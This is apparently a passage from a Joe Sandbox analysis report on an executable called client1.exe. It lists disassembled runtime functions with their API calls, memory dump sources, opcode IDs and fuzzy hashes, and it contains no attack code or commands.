                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    • Opcode ID: 495ddf033c850ee4ca08907aca6514bcd27688b7487a4889320b6227dce8e034
                                                    • Instruction ID: e3d0c66febb2d9322c5a8a91356ed234bad9b30e3c5a79894c68b578fd920845
                                                    • Opcode Fuzzy Hash: 495ddf033c850ee4ca08907aca6514bcd27688b7487a4889320b6227dce8e034
                                                    • Instruction Fuzzy Hash: 6CF017E6E4BA1281FA135B76E84037852A1AF41BA5F04C13DCD3E072B0EE3CA485A300
                                                    Function 00007FF79F63BA70 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction ID: f573e26b156dbeec8fe4ddbf6412b31814c1fa5a6ee9b81dedc133e0dd9b5fc8
                                                    • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction Fuzzy Hash: 7ED1E022B18B8189E720DF79D4402EC77BAFB847D8B804225DE6E97B99DE78D416C310
                                                    Function 00007FF79F63C430 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C54C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C5D7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction ID: 5604af1f55dfa74d243b04c6b709e5414ebe5a52dd48abac83f59e56c415e26f
                                                    • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction Fuzzy Hash: DD91F422E087A285F771AF3594402FDABFABB45B88F945139EE1E53A85CF78D441C720
                                                    Function 00007FFBAA731FD0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: strncmp
                                                    • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                    • API String ID: 1114863663-87138338
                                                    • Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                    • Instruction ID: 06d4d6c16e6fc57e5569304bd35dfe09baf0010dfe025ac327a6f73b72c3d710
                                                    • Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                    • Instruction Fuzzy Hash: D36149B2B19642C6E261AE39E40067F725AFB90780F569275EF6D436C4DE3CD8078770
                                                    Function 00007FF79F63E8DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction ID: 3e9ed73f2e8261dce19645282c8f43f150ae992c41bc12e35cf438408835576f
                                                    • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction Fuzzy Hash: 84512972F047918AFB34EF7498412FCA7AABB10358F944235ED2E52AD5DB3CA406C720
                                                    Function 00007FF79F6347D4 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction ID: da029fc5d351682b408e8feb9d914ebf8abeb788ae687c28d879cfc1d896197f
                                                    • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction Fuzzy Hash: 83516D23E087818AFB20EF71D4503FDB7AAAB48B98FA44135DE2D57699DF78D4418720
                                                    Function 00007FFBAB492D30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$BoolCompareObject_Rich
                                                    • String ID:
                                                    • API String ID: 74976934-0
                                                    • Opcode ID: cdd2b6bcb2e944d73ca2653c866df25a3401dd1b17aa824d013412721f36fff1
                                                    • Instruction ID: 9b0428594cd61e4f14eec74c57e46cfe3d5443cf193fd5061bf743b7e4e53353
                                                    • Opcode Fuzzy Hash: cdd2b6bcb2e944d73ca2653c866df25a3401dd1b17aa824d013412721f36fff1
                                                    • Instruction Fuzzy Hash: C31182B2E1A90281EA568B3AE5942BD6360AF55FF0F099334DE7A066F5DF2CD8954300
                                                    Function 00007FF79F621F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction ID: d3e74ef10bdee7ac3501ca7d7d83abf59f251e85485275c8c19478c86165f97c
                                                    • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction Fuzzy Hash: 5711EC21E1C3C241FA71BB79E9442F99297EF89790FC44030E96947B8DDE2CD5C14111
                                                    Function 00007FFBAA70D440 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: List_$Append$Dealloc
                                                    • String ID:
                                                    • API String ID: 3059130597-0
                                                    • Opcode ID: e5df2cfc70ad144d1460cb09aabecadf3178bc0b40c32a179bdd187bc4104b75
                                                    • Instruction ID: b0e1fbe7a7e2c9ffc2380d09290e2b22dd0aa26f094a78da68203136a3e013c9
                                                    • Opcode Fuzzy Hash: e5df2cfc70ad144d1460cb09aabecadf3178bc0b40c32a179bdd187bc4104b75
                                                    • Instruction Fuzzy Hash: 5A212EA1E0E702D1EB668F32E54033B66E9AF04B94F5450B7EE0D52298DF3CF596C220
                                                    Function 00007FFBAB494A00 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc
                                                    • String ID:
                                                    • API String ID: 3617616757-0
                                                    • Opcode ID: 75f5ee3f9e2dee92d5d6860bc62137785b445111f4c46999c23ff5ea1904ff93
                                                    • Instruction ID: 1c80b33a86ec34ba30d4941e3a4c6ee47a358988144f96936123bb9ab5bbdb94
                                                    • Opcode Fuzzy Hash: 75f5ee3f9e2dee92d5d6860bc62137785b445111f4c46999c23ff5ea1904ff93
                                                    • Instruction Fuzzy Hash: E511E9B2D5660141EB7A8F7AD99833C22A4AF54B79F298324CE79015F0CF6D94858384
                                                    Function 00007FFBAA6F24F8 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFloat_From$Complex_DoubleDoublesString
                                                    • String ID:
                                                    • API String ID: 2261090102-0
                                                    • Opcode ID: b245bd889db09b2cff993a6b15c25dea8df691e9df1608beecb7f61bf70a380a
                                                    • Instruction ID: f339bac1976b647e8565bf38270ba10a81fe053f9919accdaed01b84cd44eaaa
                                                    • Opcode Fuzzy Hash: b245bd889db09b2cff993a6b15c25dea8df691e9df1608beecb7f61bf70a380a
                                                    • Instruction Fuzzy Hash: BCF03190E1B946C1FA175F3CE8260BF56E87F24B49F0862B5DE4E152B0DE1D745B4A20
                                                    Function 00007FFBAA6F5CAC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: 634ba5f77c378312b060cfb67b3957d80d32da840b00503f8fcfb152740ba25c
                                                    • Instruction ID: 576d74c8388717671ddef3ba19ae9eb0ffdaffd61bbefa90f064f2cdfa60f243
                                                    • Opcode Fuzzy Hash: 634ba5f77c378312b060cfb67b3957d80d32da840b00503f8fcfb152740ba25c
                                                    • Instruction Fuzzy Hash: BB61B2B2A19781C9E7118F74E8103EE7BA4FB85798F105176EE8D16A99DF3CD146CB00
                                                    Function 00007FF79F644D3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    • Opcode ID: 8b5d587ec6f6b7eed71ba39116b338de031c50ce5c8dd23bba2b14458f06a6e4
                                                    • Instruction ID: 3225b170cf9919eee0b2f84586cb995d08a99e14da07d48812648177800a96ba
                                                    • Opcode Fuzzy Hash: 8b5d587ec6f6b7eed71ba39116b338de031c50ce5c8dd23bba2b14458f06a6e4
                                                    • Instruction Fuzzy Hash: 4D41D613A087C255FB74BB3594023FAA6AAEF81BA4FA44235EF6C07AD5DE3CD4518710
                                                    Function 00007FF79F637E6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F637E9E
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79F62B105), ref: 00007FF79F637EBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\client1.exe
                                                    • API String ID: 3580290477-3981961939
                                                    • Opcode ID: 7be78eb059dea3495cc358456d23a898a8a026444ba3d0a56d0d7994263981b4
                                                    • Instruction ID: c7243760c77a5a2ba2524ef3bb143f7c618380d230a22ee2f67c0ac2cee44451
                                                    • Opcode Fuzzy Hash: 7be78eb059dea3495cc358456d23a898a8a026444ba3d0a56d0d7994263981b4
                                                    • Instruction Fuzzy Hash: 27415F32A08B9285EB24FF35D4800F8A7AAFF45794BD44039E96E43B85EF7DE4418760
                                                    Function 00007FFBAB493F90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_Unicode_
                                                    • String ID: gfffffff
                                                    • API String ID: 3285369508-1523873471
                                                    • Opcode ID: ce2dc6916272c2e0652045ec39cde27bf4333cc68ed97e979b7b9284f6183f32
                                                    • Instruction ID: ad0e9822dc9301a0fcfb558ef0ac7fd13e925175d118ac94d329a76ee3eed51c
                                                    • Opcode Fuzzy Hash: ce2dc6916272c2e0652045ec39cde27bf4333cc68ed97e979b7b9284f6183f32
                                                    • Instruction Fuzzy Hash: 304178A2B0D78182FB118B27E0613BD6B90EB50BE0F049134DE6E4B7A1DE3CE542C781
                                                    Function 00007FFBAA7066A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_Err_FormatFreeMem_ParseTuple
                                                    • String ID: conversion from %s to Decimal is not supported
                                                    • API String ID: 2425325164-3964344595
                                                    • Opcode ID: 1930848f69a8dd755326391be5c3c490d0ca58362c088830b15d41570eaf804c
                                                    • Instruction ID: 54eb68a76b8c531bb8ab78cbeb2ecf67b6c2644fbbc82bb03064e08a55091e0c
                                                    • Opcode Fuzzy Hash: 1930848f69a8dd755326391be5c3c490d0ca58362c088830b15d41570eaf804c
                                                    • Instruction Fuzzy Hash: C741A3D0A0E643E0FA169F36D66457B9B9AAF44FC0F1060B6CD0D67B96DE6CE4438321
                                                    Function 00007FF79F63C108 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction ID: d8288a821d60d807d24e101a889977289f27ecd64d153d6bd9ca5533d84db7b9
                                                    • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction Fuzzy Hash: 6941BF22A18B8186EB30AF65E8443E9B7AAFB88794F804131EE5D87798DF7CD441C750
                                                    Function 00007FFBAA707B3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
